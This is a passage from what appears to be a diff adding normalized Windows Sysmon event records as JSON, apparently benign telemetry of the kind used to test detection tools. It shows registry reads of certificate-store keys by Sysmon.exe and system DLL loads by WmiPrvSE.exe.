"registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "perfts.dll", + "image_path": "C:\\Windows\\System32\\perfts.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "usbperf.dll", + "image_path": "C:\\Windows\\System32\\usbperf.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WmiApRpl.dll", + "image_path": "C:\\Windows\\System32\\wbem\\WmiApRpl.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 